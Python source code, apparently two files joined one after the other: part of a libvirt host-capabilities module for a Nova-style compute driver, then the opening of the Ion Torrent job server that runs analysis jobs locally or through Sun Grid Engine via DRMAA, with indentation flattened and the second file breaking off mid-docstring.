(cpus, cpu_map, online) = self.get_connection().getCPUMap()
online_cpus = set()
for cpu in range(cpus):
if cpu_map[cpu]:
online_cpus.add(cpu)
return online_cpus
def get_cpu_model_names(self):
"""Get the cpu models based on host CPU arch
:returns: a list of cpu models which supported by the given CPU arch
"""
arch = self.get_capabilities().host.cpu.arch
return self.get_connection().getCPUModelNames(arch)
@staticmethod
def _log_host_capabilities(xmlstr):
# NOTE(mriedem): This looks a bit weird but we do this so we can stub
# out this method in unit/functional test runs since the xml string is
# big and it can cause subunit parsing to fail (see bug 1813147).
LOG.info("Libvirt host capabilities %s", xmlstr)
def get_capabilities(self):
"""Returns the host capabilities information
Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
Note: The result is cached in the member attribute _caps.
:returns: a config.LibvirtConfigCaps object
"""
if not self._caps:
xmlstr = self.get_connection().getCapabilities()
self._log_host_capabilities(xmlstr)
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
# NOTE(mriedem): Don't attempt to get baseline CPU features
# if libvirt can't determine the host cpu model.
if (hasattr(libvirt,
'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES') and
self._caps.host.cpu.model is not None):
try:
xml_str = self._caps.host.cpu.to_xml()
if six.PY3 and isinstance(xml_str, six.binary_type):
xml_str = xml_str.decode('utf-8')
features = self.get_connection().baselineCPU(
[xml_str],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
if features:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
self._caps.host.cpu.features = cpu.features
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support full set"
" of host capabilities: %(error)s",
{'uri': self._uri, 'error': ex})
else:
raise
return self._caps
def get_domain_capabilities(self):
"""Returns the capabilities you can request when creating a
domain (VM) with that hypervisor, for various combinations of
architecture and machine type.
In this context the fuzzy word "hypervisor" implies QEMU
binary, libvirt itself and the host config. libvirt provides
this in order that callers can determine what the underlying
emulator and/or libvirt is capable of, prior to creating a domain
(for instance via virDomainCreateXML or virDomainDefineXML).
However nova needs to know the capabilities much earlier, when
the host's compute service is first initialised, in order that
placement decisions can be made across many compute hosts.
Therefore this is expected to be called during the init_host()
phase of the driver lifecycle rather than just before booting
an instance.
This causes an additional complication since the Python
binding for this libvirt API call requires the architecture
and machine type to be provided. So in order to gain a full
picture of the hypervisor's capabilities, technically we need
to call it with the right parameters, once for each
(architecture, machine_type) combination which we care about.
However the libvirt experts have advised us that in practice
the domain capabilities do not (yet, at least) vary enough
across machine types to justify the cost of calling
getDomainCapabilities() once for every single (architecture,
machine_type) combination. In particular, SEV support isn't
reported per-machine type, and since there are usually many
machine types, we heed the advice of the experts that it's
typically sufficient to call it once per host architecture:
https://bugzilla.redhat.com/show_bug.cgi?id=1683471#c7
However, that's not quite sufficient in the context of nova,
because SEV guests typically require a q35 machine type, as do
KVM/QEMU guests that want Secure Boot, whereas the current
default machine type for x86_64 is 'pc'. So we need results
from the getDomainCapabilities API for at least those two.
Fortunately we can take advantage of the results from the
getCapabilities API which marks selected machine types as
canonical, e.g.:
<machine canonical='pc-i440fx-2.11' maxCpus='255'>pc</machine>
<machine canonical='pc-q35-2.11' maxCpus='288'>q35</machine>
So for now, we call getDomainCapabilities for these canonical
machine types of each architecture, plus for the
architecture's default machine type, if that is not one of the
canonical types.
Future domain capabilities might report SEV in a more
fine-grained manner, and we also expect to use this method to
detect other features, such as for gracefully handling machine
types and potentially for detecting OVMF binaries. Therefore
we memoize the results of the API calls in a nested dict where
the top-level keys are architectures, and second-level keys
are machine types, in order to allow easy expansion later.
Whenever libvirt/QEMU are updated, cached domCapabilities
would get outdated (because QEMU will contain new features and
the capabilities will vary). However, this should not be a
problem here, because when libvirt/QEMU gets updated, the
nova-compute agent also needs restarting, at which point the
memoization will vanish because it's not persisted to disk.
Note: The result is cached in the member attribute
_domain_caps.
:returns: a nested dict of dicts which maps architectures to
machine types to instances of config.LibvirtConfigDomainCaps
representing the domain capabilities of the host for that arch
and machine type:
{ arch:
{ machine_type: LibvirtConfigDomainCaps }
}
"""
if self._domain_caps:
return self._domain_caps
domain_caps = defaultdict(dict)
caps = self.get_capabilities()
virt_type = CONF.libvirt.virt_type
for guest in caps.guests:
arch = guest.arch
domain = guest.domains.get(virt_type, guest.default_domain)
for machine_type in self._get_machine_types(arch, domain):
# It is expected that if there are multiple <guest>
# elements, each will have a different architecture;
# for example, on x86 hosts one <guest> will contain
# <arch name='i686'> and one will contain <arch
# name='x86_64'>. But it doesn't hurt to add a safety
# net to avoid needlessly calling libvirt's API more
# times than we need.
if machine_type and machine_type in domain_caps[arch]:
continue
self._add_to_domain_capabilities(domain.emulator, arch,
domain_caps, machine_type,
virt_type)
# NOTE(aspiers): Use a temporary variable to update the
# instance variable atomically, otherwise if some API
# calls succeeded and then one failed, we might
# accidentally memoize a partial result.
self._domain_caps = domain_caps
return self._domain_caps
def _get_machine_types(self, arch, domain):
"""Get the machine types for this architecture for which we need to
call getDomainCapabilities, i.e. the canonical machine types,
and the default machine type (if it's not one of the canonical
machine types).
See the docstring for get_domain_capabilities() for an explanation
of why we choose this set of machine types.
"""
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# See _add_to_domain_capabilities() below for how this is handled.
mtypes = set([libvirt_utils.get_default_machine_type(arch)])
mtypes.update(domain.aliases.keys())
LOG.debug("Getting domain capabilities for %(arch)s via "
"machine types: %(mtypes)s",
{'arch': arch, 'mtypes': mtypes})
return mtypes
def _add_to_domain_capabilities(self, emulator_bin, arch, domain_caps,
machine_type, virt_type):
# NOTE(aspiers): machine_type could be None here if nova
# doesn't have a default machine type for this architecture.
# In that case we pass a machine_type of None to the libvirt
# API and rely on it choosing a sensible default which will be
# returned in the <machine> element. It could also be an
# alias like 'pc' rather than a full machine type.
#
# NOTE(kchamart): Prior to libvirt v4.7.0 libvirt picked its
# default machine type for x86, 'pc', as reported by QEMU's
# default. From libvirt v4.7.0 onwards, libvirt _explicitly_
# declared the "preferred" default for x86 as 'pc' (and
# appropriate values for other architectures), and only uses
# QEMU's reported default (whatever that may be) if 'pc' does
# not exist. This was done "to isolate applications from
# hypervisor changes that may cause incompatibilities" --
# i.e. if, or when, QEMU changes its default machine type to
# something else. Refer to this libvirt commit:
#
# https://libvirt.org/git/?p=libvirt.git;a=commit;h=26cfb1a3
try:
cap_obj = self._get_domain_capabilities(
emulator_bin=emulator_bin, arch=arch,
machine_type=machine_type, virt_type=virt_type)
except libvirt.libvirtError as ex:
# NOTE(sean-k-mooney): This can happen for several
# reasons, but one common example is if you have
# multiple QEMU emulators installed and you set
# virt-type=kvm. In this case any non-native emulator,
# e.g. AArch64 on an x86 host, will (correctly) raise
# an exception as KVM cannot be used to accelerate CPU
# instructions for non-native architectures.
error_code = ex.get_error_code()
LOG.debug(
"Error from libvirt when retrieving domain capabilities "
"for arch %(arch)s / virt_type %(virt_type)s / "
"machine_type %(mach_type)s: "
"[Error Code %(error_code)s]: %(exception)s",
{'arch': arch, 'virt_type': virt_type,
'mach_type': machine_type, 'error_code': error_code,
'exception': ex})
# Remove archs added by default dict lookup when checking
# if the machine type has already been recoded.
if arch in domain_caps:
domain_caps.pop(arch)
return
# Register the domain caps using the expanded form of
# machine type returned by libvirt in the <machine>
# element (e.g. pc-i440fx-2.11)
if cap_obj.machine_type:
domain_caps[arch][cap_obj.machine_type] = cap_obj
else:
# NOTE(aspiers): In theory this should never happen,
# but better safe than sorry.
LOG.warning(
"libvirt getDomainCapabilities("
"emulator_bin=%(emulator_bin)s, arch=%(arch)s, "
"machine_type=%(machine_type)s, virt_type=%(virt_type)s) "
"returned null <machine> type",
{'emulator_bin': emulator_bin, 'arch': arch,
'machine_type': machine_type, 'virt_type': virt_type}
)
# And if we passed an alias, register the domain caps
# under that too.
if machine_type and machine_type != cap_obj.machine_type:
domain_caps[arch][machine_type] = cap_obj
cap_obj.machine_type_alias = machine_type
def _get_domain_capabilities(self, emulator_bin=None, arch=None,
machine_type=None, virt_type=None, flags=0):
xmlstr = self.get_connection().getDomainCapabilities(
emulator_bin,
arch,
machine_type,
virt_type,
flags
)
LOG.debug("Libvirt host hypervisor capabilities for arch=%s and "
"machine_type=%s:\n%s", arch, machine_type, xmlstr)
caps = vconfig.LibvirtConfigDomainCaps()
caps.parse_str(xmlstr)
return caps
def get_driver_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self.get_connection().getType()
def get_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
return self.get_connection().getVersion()
def get_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self.get_connection().getHostname()
if self._hostname is None:
self._hostname = hostname
elif hostname != self._hostname:
LOG.error('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.',
{'old': self._hostname, 'new': hostname})
return self._hostname
def find_secret(self, usage_type, usage_id):
"""Find a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
if usage_type == 'iscsi':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
elif usage_type in ('rbd', 'ceph'):
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
elif usage_type == 'volume':
usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
try:
conn = self.get_connection()
return conn.secretLookupByUsage(usage_type_const, usage_id)
except libvirt.libvirtError as e:
if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
return None
def create_secret(self, usage_type, usage_id, password=None):
"""Create a secret.
:param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
'rbd' will be converted to 'ceph'.
:param usage_id: name of resource in secret
:param password: optional secret value to set
"""
secret_conf = vconfig.LibvirtConfigSecret()
secret_conf.ephemeral = False
secret_conf.private = False
secret_conf.usage_id = usage_id
if usage_type in ('rbd', 'ceph'):
secret_conf.usage_type = 'ceph'
elif usage_type == 'iscsi':
secret_conf.usage_type = 'iscsi'
elif usage_type == 'volume':
secret_conf.usage_type = 'volume'
else:
msg = _("Invalid usage_type: %s")
raise exception.InternalError(msg % usage_type)
xml = secret_conf.to_xml()
try:
LOG.debug('Secret XML: %s', xml)
conn = self.get_connection()
secret = conn.secretDefineXML(xml)
if password is not None:
secret.setValue(password)
return secret
except libvirt.libvirtError:
with excutils.save_and_reraise_exception():
LOG.error('Error defining a secret with XML: %s', xml)
def delete_secret(self, usage_type, usage_id):
"""Delete a secret.
usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
usage_id: name of resource in secret
"""
secret = self.find_secret(usage_type, usage_id)
if secret is not None:
secret.undefine()
def _get_hardware_info(self):
"""Returns hardware information about the Node.
Note that the memory size is reported in MiB instead of KiB.
"""
return self.get_connection().getInfo()
def get_cpu_count(self):
"""Returns the total numbers of cpu in the host."""
return self._get_hardware_info()[2]
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
if CONF.libvirt.file_backed_memory > 0:
return CONF.libvirt.file_backed_memory
else:
return self._get_hardware_info()[1]
def _sum_domain_memory_mb(self, include_host=True):
"""Get the total memory consumed by guest domains
If include_host is True, subtract available host memory from guest 0
to get real used memory within dom0 within xen
"""
used = 0
for guest in self.list_guests(only_guests=False):
try:
# TODO(sahid): Use get_info...
dom_mem = int(guest._get_domain_info()[2])
except libvirt.libvirtError as e:
LOG.warning("couldn't obtain the memory from domain:"
" %(uuid)s, exception: %(ex)s",
{"uuid": guest.uuid, "ex": e})
continue
if include_host and guest.id == 0:
# Memory usage for the host domain (dom0 in xen) is the
# reported memory minus available memory
used += (dom_mem - self._get_avail_memory_kb())
else:
used += dom_mem
# Convert it to MB
return used // units.Ki
@staticmethod
def _get_avail_memory_kb():
with open('/proc/meminfo') as fp:
m = fp.read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
avail = int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1])
return avail
def get_memory_mb_used(self):
"""Get the used memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
if CONF.libvirt.virt_type == 'xen':
# For xen, report the sum of all domains, with
return self._sum_domain_memory_mb(include_host=True)
elif CONF.libvirt.file_backed_memory > 0:
# For file_backed_memory, report the total usage of guests,
# ignoring host memory
return self._sum_domain_memory_mb(include_host=False)
else:
return (self.get_memory_mb_total() -
(self._get_avail_memory_kb() // units.Ki))
def get_cpu_stats(self):
"""Returns the current CPU state of the host with frequency."""
stats = self.get_connection().getCPUStats(
libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
# getInfo() returns various information about the host node
# No. 3 is the expected CPU frequency.
stats["frequency"] = self._get_hardware_info()[3]
return stats
def write_instance_config(self, xml):
"""Defines a domain, but does not start it.
:param xml: XML domain definition of the guest.
:returns: an instance of Guest
"""
if six.PY2:
xml = encodeutils.safe_encode(xml)
domain = self.get_connection().defineXML(xml)
return libvirt_guest.Guest(domain)
def device_lookup_by_name(self, name):
"""Lookup a node device by its name.
:returns: a virNodeDevice instance
"""
return self.get_connection().nodeDeviceLookupByName(name)
def list_pci_devices(self, flags=0):
"""Lookup pci devices.
:returns: a list of virNodeDevice instance
"""
# TODO(sbauza): Replace that call by a generic _list_devices("pci")
return self.get_connection().listDevices("pci", flags)
def list_mdev_capable_devices(self, flags=0):
"""Lookup devices supporting mdev capabilities.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev_types", flags=flags)
def list_mediated_devices(self, flags=0):
"""Lookup mediated devices.
:returns: a list of virNodeDevice instance
"""
return self._list_devices("mdev", flags=flags)
def _list_devices(self, cap, flags=0):
"""Lookup devices.
:returns: a list of virNodeDevice instance
"""
try:
return self.get_connection().listDevices(cap, flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_SUPPORT:
LOG.warning("URI %(uri)s does not support "
"listDevices: %(error)s",
{'uri': self._uri, 'error': ex})
return []
else:
raise
def compare_cpu(self, xmlDesc, flags=0):
"""Compares the given CPU description with the host CPU."""
return self.get_connection().compareCPU(xmlDesc, flags)
def is_cpu_control_policy_capable(self):
"""Returns whether kernel configuration CGROUP_SCHED is enabled
CONFIG_CGROUP_SCHED may be disabled in some kernel configs to
improve scheduler latency.
"""
try:
with open("/proc/self/mounts", "r") as fd:
for line in fd.readlines():
# mount options and split options
bits = line.split()[3].split(",")
if "cpu" in bits:
return True
return False
except IOError:
return False
def _kernel_supports_amd_sev(self):
if not os.path.exists(SEV_KERNEL_PARAM_FILE):
LOG.debug("%s does not exist", SEV_KERNEL_PARAM_FILE)
return False
with open(SEV_KERNEL_PARAM_FILE) as f:
contents = f.read()
LOG.debug("%s contains [%s]", SEV_KERNEL_PARAM_FILE, contents)
return contents == "1\n"
@property
def supports_amd_sev(self):
"""Returns a boolean indicating whether AMD SEV (Secure Encrypted
Virtualization) is supported. This is conditional on support
in the hardware, kernel, qemu, and libvirt.
The result is memoized, since it is not expected to change
during the lifetime of a running nova-compute service; if the
hypervisor stack is changed or reconfigured in a way which
would affect the support, nova-compute should be restarted
anyway.
"""
if self._supports_amd_sev is None:
self._set_amd_sev_support()
return self._supports_amd_sev
def _set_amd_sev_support(self):
self._supports_amd_sev = False
if not self._kernel_supports_amd_sev():
LOG.info("kernel doesn't support AMD SEV")
self._supports_amd_sev = False
return
domain_caps = self.get_domain_capabilities()
for arch in domain_caps:
for machine_type in domain_caps[arch]:
LOG.debug("Checking SEV support for arch %s "
"and machine type %s", arch, machine_type)
for feature in domain_caps[arch][machine_type].features:
feature_is_sev = isinstance(
feature, vconfig.LibvirtConfigDomainCapsFeatureSev)
if (feature_is_sev and feature.supported):
LOG.info("AMD SEV support detected")
self._supports_amd_sev = True
return
LOG.debug("No AMD SEV support detected for any (arch, machine_type)")
|
serve.py
|
#!/usr/bin/env python
# Copyright (C) 2010 Ion Torrent Systems, Inc. All Rights Reserved
"""
Ion Job Server
==============
The Job Server connects the Torrent PC Analysis frontend to the
compute infrastructure that performs actual data analysis. It is a
tool for monitoring and managing the computational tasks required
for Ion data analysis.
The job server can either submit jobs to a DRMAA-compatible grid
resource management system (currently only Sun Grid Engine is supported),
or it can execute jobs locally by spawning analysis processes itself. The
job server's behavior is determined first by the ``SGE_ENABLED`` setting
in `settings.py`. If ``SGE_ENABLED`` is ``True``, then the job server will try
the following:
#. Check for environment variables. If any of these environment variables
are not set, the job server will attempt to extract them from `settings.py`.
* ``SGE_ROOT``
* ``SGE_CELL``
* ``SGE_CLUSTER_NAME``
* ``SGE_QMASTER_PORT``
* ``SGE_EXECD_PORT``
#. Import the python-drmaa package. This package can be installed using
`setuptools`. It also requires that libdrmaa be installed. On Ubuntu,
this can be installed with ``sudo apt-get install libdrmaa1.0``.
#. Contact the SGE Master.
If either of the first two steps fail, they will fail silently, and the
job server will revert to local-only mode. If the job server fails to
contact the SGE Master (for example, because the ``SGE_QMASTER_PORT`` is
blocked), the job server will raise an exception and terminate.
This module requires Twisted's XMLRPC server. On Ubuntu, this can be installed
with ``sudo apt-get install python-twisted``.
"""
import datetime
import json
import os
from os import path
import re
import signal
import subprocess
import sys
import threading
import traceback
import logging
from logging import handlers
from twisted.web import xmlrpc, server
# for tmap queue
from twisted.internet import reactor
LOG_FILENAME = "/var/log/ion/jobserver.log"
logger = logging.getLogger(__name__)
logger.propagate = False
logger.setLevel(logging.INFO)
rothandle = logging.handlers.RotatingFileHandler(
LOG_FILENAME, maxBytes=1024 * 1024 * 10, backupCount=5
)
cachehandle = logging.handlers.MemoryHandler(1024, logging.ERROR, rothandle)
fmt = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s")
rothandle.setFormatter(fmt)
logger.addHandler(rothandle)
logger.addHandler(cachehandle)
REFERENCE_LIBRARY_TEMP_DIR = "/results/referenceLibrary/temp/"
import iondb.anaserve.djangoinit
# from iondb.bin import djangoinit
# from iondb.rundb import models
try:
import iondb.version as version # @UnresolvedImport
GITHASH = version.IonVersionGetGitHash()
except Exception:
GITHASH = ""
__version__ = GITHASH
# local settings
try:
sys.path.append(path.dirname(path.dirname(__file__)))
from django.conf import settings
except ImportError:
sys.path.pop()
sys.path.append("../")
try:
from django.conf import settings
except ImportError:
sys.path.pop()
# distributed resource management
try:
# We want to determine if we have the ability to make calls to the
# drmaa interface. In order to do so, we first need to set environment
# variables.
if not settings.SGE_ENABLED:
# bail if SGE (currently the only supported drmaa target) is
# disabled from the site settings file.
raise ImportError
# Set env. vars necessary to talk to SGE. The SGE root contains files
# describing where the grid master lives. The other variables determine
# which of several possible grid masters to talk to.
for k in (
"SGE_ROOT",
"SGE_CELL",
"SGE_CLUSTER_NAME",
"SGE_QMASTER_PORT",
"SGE_EXECD_PORT",
"DRMAA_LIBRARY_PATH",
):
print("DEBUG: " + k)
logger.info(k)
if not k in os.environ:
print("DEBUG: " + str(getattr(settings, k)))
logger.info(str(getattr(settings, k)))
os.environ[k] = str(getattr(settings, k))
try:
import drmaa
except RuntimeError:
# drmaa will sometimes raise RuntimeError if libdrmaa1.0 is not
# installed.
logger.error("libdrmaa1.0 may not be installed")
raise ImportError
import atexit # provides cleanup of the session object
try:
HAVE_DRMAA = True
# create a single drmaa session
_session = drmaa.Session()
try:
_session.initialize()
logger.info("DRMAA session initialized")
except Exception as err:
logger.exception("Failed to initialize DRMAA session")
atexit.register(_session.exit)
djs = drmaa.JobState
# globally define some status messages
_decodestatus = {
djs.UNDETERMINED: "process status cannot be determined",
djs.QUEUED_ACTIVE: "job is queued and active",
djs.SYSTEM_ON_HOLD: "job is queued and in system hold",
djs.USER_ON_HOLD: "job is queued and in user hold",
djs.USER_SYSTEM_ON_HOLD: ("job is queued and in user " "and system hold"),
djs.RUNNING: "job is running",
djs.SYSTEM_SUSPENDED: "job is system suspended",
djs.USER_SUSPENDED: "job is user suspended",
djs.DONE: "job finished normally",
djs.FAILED: "job finished, but failed",
}
InvalidJob = drmaa.errors.InvalidJobException
except drmaa.errors.InternalException as err:
logger.error("DRMAA import failed, potential config problem: %s" % err)
# If we successfully import drmaa, but it somehow wasn't configured
# properly, we will gracefully bail by raising ImportError
raise ImportError
except (ImportError, AttributeError):
logger.error("Bailed during DRMAA set-up")
# drmaa import failed
HAVE_DRMAA = False
InvalidJob = ValueError
# regexps
SCRIPTNAME_RE = re.compile(r"^ion_analysis_(\d+)\.py$")
# utility functions
def index2scriptname(index):
return "ion_analysis_%02d.py" % index
def index2paramsname(index):
return "ion_params_%02d.json" % index
def safewrite(fname, s):
outfile = None
try:
outfile = open(fname, "w")
outfile.write(s.encode("UTF-8"))
finally:
if outfile is not None:
outfile.close()
def writeint(fname, n):
safewrite(fname, "%d" % n)
def have_drmaa(host):
return HAVE_DRMAA
class Analysis(object):
"""``Analysis`` objects capture the properties of a single running
analysis job. While ``Analysis`` is an abstract base class,
``DRMAnalysis`` and ``LocalAnalysis`` are the implementations for
grid mode and local mode, respectively.
Each analysis writes out a script file (passed in with the ``script``
argument), a parameters file (``params``),
and a list of miscellaneous files (``files``) needed for the analysis job.
It then spawns the analysis and
generates a proxy object which an ``AnalysisQueue`` object can use
to wait for a job to finish. Once the job has finished, the ``Analysis``
object handles cleanup.
The ``pk`` argument specifies a unique identifier for the job.
The ``savePath`` argument specifices the working directory for the
analysis job.
``Analysis`` objects are also responsible for job control. Using the
``suspend()``, ``resume()``, and ``terminate()`` methods, a job can be
paused (suspended), resumed, or terminated.
"""
ANALYSIS_TYPE = ""
def __init__(
self, name, script, params, files, savePath, pk, chipType, chips, job_type
):
"""Initialize by storing essential parameters."""
super(Analysis, self).__init__()
self.name = name
self.script = script
self.params = params
self.savePath = savePath
self.chipType = chipType
self.pk = pk
self.chips = chips
for pair in files:
assert len(pair) == 2
for ele in pair:
assert isinstance(ele, (str, unicode))
self.files = files
self.job_type = job_type
def get_id(self):
"""Returns the running job's ID number given by the underlying
execution system.
If the job server is running in grid mode,
then the ID returned is a grid "job id," whereas if the job
server is running in local mode, it will be a process ID
number.
"""
return None
def status_string(self):
"""Return a message describing the state of the analysis. By
default, this will be an empty string."""
return ""
def initiate(self, rootdir):
"""Begin an analysis, and return a proxy object on which
the ``AnalysisQueue`` will wait."""
return None
def conclude(self, comm_result):
"""Clean up after an analysis has completed."""
return False
def suspend(self):
"""Suspend a job in progess. Returns ``True`` if the analysis
was successfully suspended, and otherwise it returns ``False``."""
return False
def resume(self):
"""Resume a suspended job. Returns ``True`` if the analysis was
successfully resumed, other it returns ``False``."""
return False
def terminate(self):
"""Terminate a job in progress. Returns ``True`` if the analysis
was successfully terminated, otherwise it returns ``False``."""
return False
def _get_script_index(self, adir):
matches = [SCRIPTNAME_RE.match(fn) for fn in os.listdir(adir)]
extract_valid = lambda acc, x: x and acc.append(int(x.groups(1)[0]))
inds = reduce(extract_valid, matches, [])
return (inds and max(inds) + 1) or 0
def _write_out(self, adir):
"""Dump out files needed for the analysis into directory 'adir'."""
# make sure we have params as JSON text
os.umask(0o0002)
if isinstance(self.params, dict):
self.params = json.dumps(self.params)
if not path.isdir(adir):
try:
os.makedirs(adir)
except Exception:
logger.error(
"Analysis cannot start. Failed to create directory: %s." % adir
)
logger.debug(traceback.format_exc())
return None, None
# find the appropriate script index, in case we are re-running
script_index = self._get_script_index(adir)
script_fname = path.join(adir, index2scriptname(script_index))
params_fname = path.join(adir, index2paramsname(script_index))
# dump out script and parameters
safewrite(script_fname, self.script)
os.chmod(script_fname, 0o0775)
safewrite(params_fname, self.params)
for name, content in self.files:
safewrite(path.join(adir, name), content)
manifest = "\n".join(name for name, content in self.files)
safewrite(path.join(adir, "manifest.txt"), manifest)
return script_fname, params_fname
def tolerate_invalid_job(fn):
"""Decorator to catch invalid job references and handle them silently."""
def ret(*args):
try:
result = fn(*args)
except InvalidJob:
logger.warning("Invalid job id requested: %s" % str(args))
result = False
return result
ret.func_name = fn.func_name
ret.__doc__ = fn.__doc__
return ret
class DRMAnalysis(Analysis):
"""``DRMAnalysis`` implements analysis on Sun Grid Engine."""
ANALYSIS_TYPE = "grid"
class DRMWaiter(object):
"""Wrapper around a job id to allow the AnalysisQueue to .communicate()
with a grid job as if it were a process."""
def __init__(self, jobid, parent):
self.jobid = jobid
self.parent = parent
def communicate(self):
timeout = drmaa.Session.TIMEOUT_WAIT_FOREVER
try:
self.parent.retval = _session.wait(self.jobid, timeout)
except Exception as err:
logger.warning("Session wait exception: %s" % err)
self.parent.terminated = True
def __init__(
self, name, script, params, files, savePath, pk, chipType, chips, job_type
):
super(DRMAnalysis, self).__init__(
name, script, params, files, savePath, pk, chipType, chips, job_type
)
self.retval = None
self.jobid = None
self.terminated = False
def get_sge_params(self, chip_to_slots, chipType):
ret = "-pe ion_pe 1"
# ret = '-pe ion_pe 1 -l h_vmem=10000M'
for chip, args in chip_to_slots.items():
if chip in chipType:
ret = args.strip()
return ret
return ret
def initiate(self, rootdir):
"""Spawn an analysis on the grid.
Instructs the grid to capture the analysis script's standard output
and standard error in two files called ``drmaa_stdout.txt`` and
``drmaa_stderr.txt``, respectively.
"""
adir = path.join(self.savePath)
script_fname, params_fname = self._write_out(adir)
if script_fname is None:
return None
jt = _session.createJobTemplate()
qname = "tl.q"
if self.job_type == "thumbnail":
qname = "thumbnail.q"
# SGE
jt.nativeSpecification = "%s -w w -q %s" % (
self.get_sge_params(self.chips, self.chipType),
qname,
)
# TORQUE
# jt.nativeSpecification = ""
jt.remoteCommand = "python"
jt.workingDirectory = adir
jt.outputPath = ":" + path.join(adir, "drmaa_stdout.txt")
# jt.errorPath = ":" + path.join(adir, "drmaa_stderr.txt")
jt.args = (script_fname, params_fname)
jt.joinFiles = True # Merge stdout and stderr
self.jobid = _session.runJob(jt)
ret = self.DRMWaiter(self.jobid, self)
_session.deleteJobTemplate(jt)
return ret
def conclude(self, comm_result):
"""Clean up once a grid job finishes.
If the job completed successfully, writes out "1" into
a file ``status.txt`` in the job's working directory. THIS IS A BUG,
and instead should write out the job's exit status.
If the job was terminated, then the method writes "-1" instead.
"""
outpath = path.join(self.savePath, "status.txt")
if self.terminated:
writeint(outpath, -1)
return -1
else:
assert self.retval is not None
retcode = int(self.retval.hasExited)
writeint(outpath, retcode)
return retcode == 0
def _running(self):
return (self.jobid is not None) and (self.retval is None)
@tolerate_invalid_job
def suspend(self):
"""Suspends the job by issuing a command to the grid."""
if not self._running():
return False
_session.control(self.jobid, drmaa.JobControlAction.SUSPEND)
return True
@tolerate_invalid_job
def resume(self):
"""Resumes the job by issuing a command to the grid."""
if not self._running():
return False
_session.control(self.jobid, drmaa.JobControlAction.RESUME)
return True
@tolerate_invalid_job
def terminate(self):
"""Terminates the job by issuing a command to the grid."""
logger.info("DRMAA terminate job %s" % self.jobid)
if not self._running():
return False
joblistfile = os.path.join(self.savePath, "job_list.json")
if os.path.exists(joblistfile):
try:
with open(joblistfile) as f:
contents = json.load(f)
blocks = sum(
[list(block.values()) for block in list(contents.values())], []
)
for blockjobid in blocks:
try:
logger.debug(
"terminate job %s, status %s"
% (blockjobid, _session.jobStatus(blockjobid))
)
_session.control(blockjobid, drmaa.JobControlAction.TERMINATE)
except Exception:
logger.error("Failed to terminate %s" % blockjobid)
except Exception:
logger.error("DRMAA terminate error reading from %s" % joblistfile)
_session.control(self.jobid, drmaa.JobControlAction.TERMINATE)
return True
def get_id(self):
return self.jobid
def status_string(self):
unknown = "(unknown)"
try:
jid = _session.jobStatus(self.jobid)
except InvalidJob:
logger.warning("Querying status of unkown job: %s" % self.jobid)
return unknown
return _decodestatus.get(jid, unknown)
class LocalAnalysis(Analysis):
"""Describes a local, non-grid analysis. Runs by spawning a process."""
ANALYSIS_TYPE = "local"
def __init__(
self, name, script, params, files, savePath, pk, chipType, chips, job_type
):
super(LocalAnalysis, self).__init__(
name, script, params, files, savePath, pk, chipType, chips, job_type
)
self.proc = None
def initiate(self, rootdir):
"""Initiates a local job by spawning a process directly.
Writes the process's PID to a file named ``pid`` in the
job's working directory. The returned proxy object is a
`subprocess.Popen` object.
"""
if self.proc is not None:
# we shouldn't run one analysis object more than once
return None
# determine where we will write out analysis files, and create it
adir = path.join(self.savePath)
script_fname, params_fname = self._write_out(adir)
args = (sys.executable, script_fname, params_fname)
# create process
self.proc = subprocess.Popen(args, cwd=adir)
# save PID
writeint(path.join(self.savePath, "pid"), self.proc.pid)
return self.proc
def conclude(self, comm_result):
"""
Concludes by writing the process's return code to ``status.txt`` in
the job's working directory.
"""
retcode = self.proc.returncode
assert retcode is not None
# save the return code to file in order to determine if the analysis
# completed successfully or not
writeint(path.join(self.savePath, "status.txt"), retcode)
return retcode == 0
def _running(self):
"""Determine if the analysis process is running."""
return self.proc and self.proc.returncode is None
def suspend(self):
"""Suspends the process by sending it ``SIGSTOP``."""
if not self._running():
return False
try:
self.proc.send_signal(signal.SIGSTOP)
except Exception:
logger.warning("SIGSTOP failed")
return False
return self._running()
def resume(self):
"""Resumes the process by sending it ``SIGCONT``."""
if not self._running():
return False
try:
self.proc.send_signal(signal.SIGCONT)
except Exception:
logger.warning("SIGCONT failed")
return False
return True
def terminate(self):
"""Terminates the process by calling ``subprocess.Popen``'s
``terminate()`` method.
"""
if not self._running():
return False
self.proc.terminate()
return True
def get_id(self):
if self.proc is None:
return None
return self.proc.pid
class AnalysisQueue(object):
"""
The ``AnalysisQueue`` is responsible for managing and monitoring
all jobs the job server is currently running. It is intended to be a
singleton object.
It maintains a queue
